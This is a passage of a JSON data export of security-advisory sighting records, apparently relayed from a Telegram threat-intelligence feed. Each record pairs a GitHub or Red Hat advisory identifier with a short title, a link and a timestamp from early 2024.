"f5aea7f6-14e5-43b1-bd7b-ba3905ebfd8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HWG-W5JG-9C6X", "type": "seen", "source": "https://t.me/ctinow/177218", "content": "https://ift.tt/cX36CAh\n[GHSA-6hwg-w5jg-9c6x] Path Traversal in Moby builder", "creation_timestamp": "2024-02-01T00:26:29.000000Z"}, {"uuid": "cf3916dc-ebb1-4d1d-8653-e4f40fd4d40f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PF55-FJ96-XF37", "type": "seen", "source": "https://t.me/ctinow/177006", "content": "https://ift.tt/CrGp2TZ\n[GHSA-pf55-fj96-xf37] @lobehub/chat vulnerable to unauthorized access to plugins", "creation_timestamp": "2024-01-31T19:17:50.000000Z"}, {"uuid": "25819b23-7f2a-4edc-b317-c3ad4052e185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P59W-9GQW-WJ8R", "type": "seen", "source": "https://t.me/ctinow/177005", "content": "https://ift.tt/c95D2Ai\n[GHSA-p59w-9gqw-wj8r] Label Studio SSRF on Import Bypassing `SSRF_PROTECTION_ENABLED` Protections", "creation_timestamp": "2024-01-31T19:17:48.000000Z"}, {"uuid": "2a5ed96c-d0dd-4777-91a9-728b140bbf37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0485", "type": "seen", "source": "https://t.me/ctinow/176943", "content": "https://ift.tt/oRgQ3Lk\nRHSA-2024:0485: Important: OpenShift Container Platform 4.12.48 bug fix and security update", "creation_timestamp": "2024-01-31T18:16:41.000000Z"}, {"uuid": "1997f9c3-18fd-47c4-9fa2-be6f48f8cd31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0489", "type": "seen", "source": "https://t.me/ctinow/176942", "content": "https://ift.tt/pVEDo8b\nRHSA-2024:0489: Moderate: OpenShift Container Platform 4.12.48 packages and security update", "creation_timestamp": "2024-01-31T18:16:40.000000Z"}, {"uuid": "df8e468f-6268-4267-b8ef-5e9ac1814f6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4MP7-2M29-GQXF", "type": "seen", "source": "https://t.me/ctinow/176403", "content": "https://ift.tt/09wybQa\n[GHSA-4mp7-2m29-gqxf] HashiCorp Vault Authentication bypass", "creation_timestamp": "2024-01-31T01:37:02.000000Z"}, {"uuid": "7fe8d059-a427-462b-9c69-77b056ecb416", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQXQ-HVXW-9MV9", "type": "seen", "source": "https://t.me/ctinow/177797", "content": "https://ift.tt/vWqJKTb\n[GHSA-vqxq-hvxw-9mv9] Statmic CMS vulnerable to account takeover via XSS and password reset link", "creation_timestamp": "2024-02-01T22:06:55.000000Z"}, {"uuid": "a2ffad28-4d0b-406c-94af-f453b889ad83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XW73-RW38-6VJC", "type": "seen", "source": "https://t.me/ctinow/177796", "content": "https://ift.tt/ByPFdJI\n[GHSA-xw73-rw38-6vjc] Moby vulnerable to classic builder cache poisoning", "creation_timestamp": "2024-02-01T22:06:54.000000Z"}, {"uuid": "dad8d126-42c7-44e7-8d75-c2f98e8ae1bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VGH3-MWXQ-RCP8", "type": "seen", "source": "https://t.me/ctinow/177795", "content": "https://ift.tt/SZ4iKHF\n[GHSA-vgh3-mwxq-rcp8] Hashicorp Vault may expose sensitive log information", "creation_timestamp": "2024-02-01T22:06:53.000000Z"}, {"uuid": "0345bc43-1d20-4175-b245-74e31c387cb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:2060", "type": "seen", "source": "https://t.me/ctinow/177666", "content": "https://ift.tt/2fGueV4\nCVE-2019-6470 | Red Hat Linux Enterprise 7 DHCP denial of service (RHSA-2019:2060)", "creation_timestamp": "2024-02-01T16:41:50.000000Z"}, {"uuid": "1067e531-34e0-429a-9b23-0a7989bb42cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2014:0215", "type": "seen", "source": "https://t.me/ctinow/177626", "content": "https://ift.tt/4aYiAgB\nCVE-2013-0186 | Red Hat ManageIQ EVM cross site scripting (RHSA-2014:0215 / OSVDB-105065)", "creation_timestamp": "2024-02-01T15:46:40.000000Z"}, {"uuid": "92b83bf8-634e-43f4-bf95-c28837917cbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR7R-F8XQ-VFVV", "type": "seen", "source": "https://t.me/ctinow/177539", "content": "https://ift.tt/p6WuzJI\nCVE-2024-21626 | opencontainers runc up to 1.1.11 on Linux Internal File Descriptor file descriptor (GHSA-xr7r-f8xq-vfvv)", "creation_timestamp": "2024-02-01T12:41:13.000000Z"}, {"uuid": "fa7213dd-3fc3-4f46-9958-f34b5441d5d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0746", "type": "seen", "source": "https://t.me/ctinow/181520", "content": "https://ift.tt/zqDbe26\nRHSA-2024:0746: Important: new container image: rhceph-5.3", "creation_timestamp": "2024-02-08T18:17:13.000000Z"}, {"uuid": "9c21fc6a-bc8a-44bb-a672-b11ccfd1c4cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4M5-J36M-8X72", "type": "seen", "source": "https://t.me/ctinow/171494", "content": "https://ift.tt/2CiLUSZ\n[GHSA-m4m5-j36m-8x72] html injection vulnerability in the `tuitse_html` function.", "creation_timestamp": "2024-01-22T22:46:37.000000Z"}, {"uuid": "ca52410e-3310-499d-bacc-5e3afa7803fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FH38-9FGR-454W", "type": "seen", "source": "https://t.me/ctinow/171493", "content": "https://ift.tt/4hwQEgo\n[GHSA-fh38-9fgr-454w] Cross-site Scripting in Ghost", "creation_timestamp": "2024-01-22T22:46:36.000000Z"}, {"uuid": "56a461fb-5079-4c26-b2e8-762657f149f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HJ55-9JMV-9JRJ", "type": "seen", "source": "https://t.me/ctinow/171492", "content": "https://ift.tt/eJGsgNX\n[GHSA-hj55-9jmv-9jrj] Sandbox escape in Artemis Java Test Sandbox", "creation_timestamp": "2024-01-22T22:46:34.000000Z"}, {"uuid": "5dee2d9a-7276-45db-923e-0d323f5cba98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7QV-8R2H-PG27", "type": "seen", "source": "https://t.me/ctinow/171490", "content": "https://ift.tt/7uV8TPA\n[GHSA-r7qv-8r2h-pg27] Multiple issues involving quote API in shlex", "creation_timestamp": "2024-01-22T22:37:00.000000Z"}, {"uuid": "f55362dd-b062-4981-864b-3c4446dac47d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JGXC-8MWQ-9XQW", "type": "seen", "source": "https://t.me/ctinow/171491", "content": "https://ift.tt/wIAbPpX\n[GHSA-jgxc-8mwq-9xqw] Clojure classes can be used to craft a serialized object that runs arbitrary code on deserialization", "creation_timestamp": "2024-01-22T22:37:02.000000Z"}, {"uuid": "4b33dcca-e3ac-4e0d-b1be-a401c30509e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-297X-2QF3-JRJ3", "type": "seen", "source": "https://t.me/ctinow/171489", "content": "https://ift.tt/LxGBeYS\n[GHSA-297x-2qf3-jrj3] Unsafe yaml deserialization in llama-hub", "creation_timestamp": "2024-01-22T22:36:59.000000Z"}, {"uuid": "13807638-caa2-494d-a797-597a322dad6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RHHJ-5436-95VF", "type": "seen", "source": "https://t.me/ctinow/171488", "content": "https://ift.tt/F3TkJcl\n[GHSA-rhhj-5436-95vf] Code execution in Embedchain", "creation_timestamp": "2024-01-22T22:36:58.000000Z"}, {"uuid": "0ae475c9-0c8b-46b2-ad9a-819d10e02241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4V98-7QMW-RQR8", "type": "seen", "source": "https://t.me/ctinow/177200", "content": "https://ift.tt/iH9mcDg\n[GHSA-4v98-7qmw-rqr8] BuildKit vulnerable to possible host system access from mount stub cleaner", "creation_timestamp": "2024-01-31T23:56:57.000000Z"}, {"uuid": "c37fbdd7-9cb3-4083-9ec2-b439953b468e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WR6V-9F75-VH2G", "type": "seen", "source": "https://t.me/ctinow/177199", "content": "https://ift.tt/PXCAs7r\n[GHSA-wr6v-9f75-vh2g] Buildkit's interactive containers API does not validate entitlements check", "creation_timestamp": "2024-01-31T23:56:56.000000Z"}, {"uuid": "447925fc-aa91-47f3-888a-60d64cf269ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G8VP-2V5P-9QFH", "type": "seen", "source": "https://t.me/ctinow/169512", "content": "https://ift.tt/rTcJM2H\n[GHSA-g8vp-2v5p-9qfh] Cross-site scripting (XSS) in Action messages on Avo", "creation_timestamp": "2024-01-17T23:46:26.000000Z"}, {"uuid": "31037b1e-823e-4bf0-a77b-d499c6a41c17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0248", "type": "seen", "source": "https://t.me/ctinow/169445", "content": "https://ift.tt/1rOBagj\nRHSA-2024:0248: Important: java-21-openjdk security update", "creation_timestamp": "2024-01-17T20:21:45.000000Z"}, {"uuid": "2b6d79d1-4c9d-4495-8d53-7dd03d2331d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QWJ8-QGPR-8CRM", "type": "seen", "source": "https://t.me/ctinow/181591", "content": "https://ift.tt/cJQRXiv\n[GHSA-qwj8-qgpr-8crm] Liferay Portal vulnerable to user impersonation", "creation_timestamp": "2024-02-08T19:46:11.000000Z"}, {"uuid": "07095ab4-7490-485b-8cee-6cc9d30dd7b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0748", "type": "seen", "source": "https://t.me/ctinow/181565", "content": "https://ift.tt/2REUNWx\nRHSA-2024:0748: Important: container-tools:4.0 security update", "creation_timestamp": "2024-02-08T19:22:13.000000Z"}, {"uuid": "3411e11f-188d-4de0-b0a0-d2d6a8319b03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0749", "type": "seen", "source": "https://t.me/ctinow/181564", "content": "https://ift.tt/Wq9tMvB\nRHSA-2024:0749: Moderate: unbound security update", "creation_timestamp": "2024-02-08T19:22:09.000000Z"}, {"uuid": "c4316896-4075-4d7e-b2b6-cfdc847fca0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0750", "type": "seen", "source": "https://t.me/ctinow/181563", "content": "https://ift.tt/2hdHi0R\nRHSA-2024:0750: Moderate: libmaxminddb security update", "creation_timestamp": "2024-02-08T19:22:08.000000Z"}, {"uuid": "3b9d32dd-751e-42c9-81fd-5a81a42ad607", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0751", "type": "seen", "source": "https://t.me/ctinow/181562", "content": "https://ift.tt/ayHnGwS\nRHSA-2024:0751: Moderate: libmaxminddb security update", "creation_timestamp": "2024-02-08T19:22:07.000000Z"}, {"uuid": "0cfb9963-fbd5-4cc3-8067-9bc15b580445", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0752", "type": "seen", "source": "https://t.me/ctinow/181561", "content": "https://ift.tt/VIuo62X\nRHSA-2024:0752: Important: container-tools:rhel8 security update", "creation_timestamp": "2024-02-08T19:22:06.000000Z"}, {"uuid": "4ea9fa0d-d003-4568-a7c1-9878dbdc4a4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0753", "type": "seen", "source": "https://t.me/ctinow/181560", "content": "https://ift.tt/JTlKojV\nRHSA-2024:0753: Moderate: linux-firmware security update", "creation_timestamp": "2024-02-08T19:22:05.000000Z"}, {"uuid": "cef94cdb-39e2-4fce-9f2a-2408106f898c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0756", "type": "seen", "source": "https://t.me/ctinow/181559", "content": "https://ift.tt/KYG3lms\nRHSA-2024:0756: Important: runc security update", "creation_timestamp": "2024-02-08T19:22:04.000000Z"}, {"uuid": "aa961b1a-0832-42e6-b56a-0123c4853f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0728", "type": "seen", "source": "https://t.me/ctinow/181522", "content": "https://ift.tt/ZINxVUb\nRHSA-2024:0728: Moderate: Logging Subsystem 5.8.3 - Red Hat OpenShift", "creation_timestamp": "2024-02-08T18:17:16.000000Z"}, {"uuid": "abe60a88-121b-4d86-b01f-88791e0a88ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0759", "type": "seen", "source": "https://t.me/ctinow/181556", "content": "https://ift.tt/OpGuTtS\nRHSA-2024:0759: Important: container-tools:rhel8 security update", "creation_timestamp": "2024-02-08T19:22:00.000000Z"}, {"uuid": "3f725cfd-9260-46d9-9e54-f1820781d802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0760", "type": "seen", "source": "https://t.me/ctinow/181555", "content": "https://ift.tt/R4dcOvt\nRHSA-2024:0760: Important: container-tools:3.0 security update", "creation_timestamp": "2024-02-08T19:21:59.000000Z"}, {"uuid": "2c692ee7-f4f3-458e-b2c2-97c05d6d2014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0745", "type": "seen", "source": "https://t.me/ctinow/181521", "content": "https://ift.tt/anv4ZIE\nRHSA-2024:0745: Moderate: Red Hat Ceph Storage 5.3 Security update", "creation_timestamp": "2024-02-08T18:17:15.000000Z"}, {"uuid": "c42619f0-518f-442e-8bd0-5bbfea53d9bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0340", "type": "seen", "source": "https://t.me/ctinow/171851", "content": "https://ift.tt/aELb3N1\nRHSA-2024:0340: Important: kpatch-patch security update", "creation_timestamp": "2024-01-23T11:16:38.000000Z"}, {"uuid": "2aaacfd1-bd83-4fd7-8ee6-80917cb5a97b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9RHQ-86FM-QXQC", "type": "seen", "source": "https://t.me/ctinow/171487", "content": "https://ift.tt/4pqBNkX\n[GHSA-9rhq-86fm-qxqc] Hard-coded credentials in org.folio:mod-data-export-spring", "creation_timestamp": "2024-01-22T22:36:57.000000Z"}, {"uuid": "af63b2da-f81c-4be7-8b0d-3916b449a3f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C4PG-5GGH-VCPP", "type": "seen", "source": "https://t.me/ctinow/171486", "content": "https://ift.tt/43S9oc0\n[GHSA-c4pg-5ggh-vcpp] Sandbox escape in Artemis Java Test Sandbox", "creation_timestamp": "2024-01-22T22:36:56.000000Z"}, {"uuid": "83369329-e8e8-4343-b6de-7456b258c615", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F63-HFP8-52JQ", "type": "seen", "source": "https://t.me/ctinow/171485", "content": "https://ift.tt/sXFWbJv\n[GHSA-3f63-hfp8-52jq] Arbitrary Code Execution in Pillow", "creation_timestamp": "2024-01-22T22:36:54.000000Z"}, {"uuid": "2dbabf79-b96e-4a73-91bb-59ddf00fc777", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7PH-8423-PF4J", "type": "seen", "source": "https://t.me/ctinow/171484", "content": "https://ift.tt/ASzLHBc\n[GHSA-g7ph-8423-pf4j] Code execution in metagpt", "creation_timestamp": "2024-01-22T22:31:58.000000Z"}, {"uuid": "fc291fbe-b5a1-43ed-95fe-969ce7795a77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R67W-F99W-MGXJ", "type": "seen", "source": "https://t.me/ctinow/171483", "content": "https://ift.tt/k6oSQza\n[GHSA-r67w-f99w-mgxj] ReDoS in Embedchain", "creation_timestamp": "2024-01-22T22:31:57.000000Z"}, {"uuid": "f7a5195c-7726-4fea-82ff-4fb4944d4d5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GHM2-RQ8Q-WRHC", "type": "seen", "source": "https://t.me/ctinow/170892", "content": "https://ift.tt/v3Un1ck\nCVE-2023-52137 | tj-actions verify-changed-files up to 16.x input validation (GHSA-ghm2-rq8q-wrhc)", "creation_timestamp": "2024-01-21T17:46:07.000000Z"}, {"uuid": "a8b37958-f10d-41ce-af39-4c31fb42bb63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XGPM-Q3MQ-46RQ", "type": "seen", "source": "https://t.me/ctinow/171833", "content": "https://ift.tt/t4xMLbF\nCVE-2024-21627 | PrestaShop isCleanHTML cross site scripting (GHSA-xgpm-q3mq-46rq)", "creation_timestamp": "2024-01-23T10:26:59.000000Z"}, {"uuid": "393234d7-9d9b-42e8-a2a1-18c718f67b9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0322", "type": "seen", "source": "https://t.me/ctinow/171267", "content": "https://ift.tt/S5IWose\nRHSA-2024:0322: Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update", "creation_timestamp": "2024-01-22T16:18:58.000000Z"}, {"uuid": "4c9d6499-fcf9-4ea5-8d9a-968fb6db2738", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJ6H-64FC-37MP", "type": "seen", "source": "https://t.me/ctinow/171495", "content": "https://ift.tt/vBUuL9D\n[GHSA-wj6h-64fc-37mp] Minerva timing attack on P-256 in python-ecdsa", "creation_timestamp": "2024-01-22T22:46:38.000000Z"}, {"uuid": "acc5e852-d2c9-445a-8294-1c9b117a5d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0337", "type": "seen", "source": "https://t.me/ctinow/171470", "content": "https://ift.tt/4GLPTUk\nRHSA-2024:0337: Important: RHACS 4.2 security update", "creation_timestamp": "2024-01-22T22:16:34.000000Z"}, {"uuid": "d56c10e1-aab6-4aeb-9ede-fd6bc18b17a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5C8-RQWP-CP95", "type": "seen", "source": "https://t.me/ctinow/175778", "content": "https://ift.tt/ENuRkTZ\nCVE-2024-22195 | Pallets Jinja prior 3.1.3 HTML Attribute cross site scripting (GHSA-h5c8-rqwp-cp95)", "creation_timestamp": "2024-01-30T09:41:34.000000Z"}, {"uuid": "ecf73216-38ba-457a-a393-bc2ecbb77f03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QCJQ-7F7V-PVC8", "type": "seen", "source": "https://t.me/ctinow/175607", "content": "https://ift.tt/o2mKMbn\n[GHSA-qcjq-7f7v-pvc8] Nginx-UI vulnerable to authenticated RCE through injecting into the application config via CRLF", "creation_timestamp": "2024-01-29T23:46:31.000000Z"}, {"uuid": "ebf65d90-7cdb-4de2-bddd-ef75fc0089d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPXW-5XFM-X22V", "type": "seen", "source": "https://t.me/ctinow/175604", "content": "https://ift.tt/ScWphYd\n[GHSA-wpxw-5xfm-x22v] MeshCentral algorithm-downgrade issue", "creation_timestamp": "2024-01-29T23:37:26.000000Z"}, {"uuid": "2ef9442f-3843-4f29-b0dd-0cf431265c0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3VVC-V8C2-43R7", "type": "seen", "source": "https://t.me/ctinow/175603", "content": "https://ift.tt/OeJQryF\n[GHSA-3vvc-v8c2-43r7] Apache Kylin has Insufficiently Protected Credentials", "creation_timestamp": "2024-01-29T23:37:25.000000Z"}, {"uuid": "7c188b3c-23aa-4611-8c1c-44bd35115980", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0332", "type": "seen", "source": "https://t.me/ctinow/171392", "content": "https://ift.tt/sEI8wl6\nRHSA-2024:0332: Important: ACS 4.1 enhancement update", "creation_timestamp": "2024-01-22T20:16:24.000000Z"}, {"uuid": "e2070721-7aaf-4335-96b6-72347596c593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0325", "type": "seen", "source": "https://t.me/ctinow/171365", "content": "https://ift.tt/QKxUbBc\nRHSA-2024:0325: Important: Updated RHEL-7-based Middleware container images", "creation_timestamp": "2024-01-22T19:17:03.000000Z"}, {"uuid": "44d5d97d-1254-492f-b16f-1d9ad83b0899", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJWV-5J3M-P5X4", "type": "seen", "source": "https://t.me/ctinow/170630", "content": "https://ift.tt/PeT6Ra4\nCVE-2023-52082 | Lychee up to 5.0.1 sql injection (GHSA-rjwv-5j3m-p5x4)", "creation_timestamp": "2024-01-20T14:46:10.000000Z"}, {"uuid": "35ec8c49-99b4-4710-a536-5e564640adfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7HPJ-7HHX-2FGX", "type": "seen", "source": "https://t.me/ctinow/170626", "content": "https://ift.tt/rezPkmK\nCVE-2023-52079 | kriszyp msgpackr up to 1.10.0 MessagePack Message recursion (GHSA-7hpj-7hhx-2fgx)", "creation_timestamp": "2024-01-20T14:16:22.000000Z"}, {"uuid": "530da499-d808-4c67-9270-9593e15cc150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0137", "type": "seen", "source": "https://t.me/ctinow/174909", "content": "https://ift.tt/jKHxfs1\nCVE-2023-5455 | ipa prior 4-11-1 cross-site request forgery (RHSA-2024:0137)", "creation_timestamp": "2024-01-28T11:56:51.000000Z"}, {"uuid": "75255d9b-d9df-41f4-98a5-5309f9884db0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0101", "type": "seen", "source": "https://t.me/ctinow/174745", "content": "https://ift.tt/wtGe40S\nCVE-2019-17596 | Google Go up to 1.12.10/1.3.1 Certificate Verification interpretation conflict (RHSA-2020:0101)", "creation_timestamp": "2024-01-27T12:16:35.000000Z"}, {"uuid": "70e34096-f953-4e07-8488-8f7f4c2ab940", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0319", "type": "seen", "source": "https://t.me/ctinow/171221", "content": "https://ift.tt/tl4fiO8\nRHSA-2024:0319: Moderate: gnutls security update", "creation_timestamp": "2024-01-22T15:16:35.000000Z"}, {"uuid": "00c4ae71-8385-43e0-b83d-400d48e893d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0320", "type": "seen", "source": "https://t.me/ctinow/171220", "content": "https://ift.tt/sDRFfYV\nRHSA-2024:0320: Important: xorg-x11-server security update", "creation_timestamp": "2024-01-22T15:16:34.000000Z"}, {"uuid": "b341e6da-304e-4927-9889-55c4d0d4d2de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2X7R-93WW-CXRQ", "type": "seen", "source": "https://t.me/ctinow/170652", "content": "https://ift.tt/HWb9g4e\nCVE-2023-52085 | Winter CMS up to 1.2.3 ColorPicker FormWidget path traversal (GHSA-2x7r-93ww-cxrq)", "creation_timestamp": "2024-01-20T15:17:17.000000Z"}, {"uuid": "b219d275-cb37-4f9f-805b-93d482521f34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RGRF-6MF5-M882", "type": "seen", "source": "https://t.me/ctinow/175741", "content": "https://ift.tt/D1ELCml\nCVE-2024-22194 | Cyber-Domain-Ontology CDO-Utility-Local-UUID up to 0.12.0 unknown vulnerability (GHSA-rgrf-6mf5-m882)", "creation_timestamp": "2024-01-30T08:41:24.000000Z"}, {"uuid": "3e745991-b3af-4760-915c-36d4c0176183", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RMF-5G48-XV63", "type": 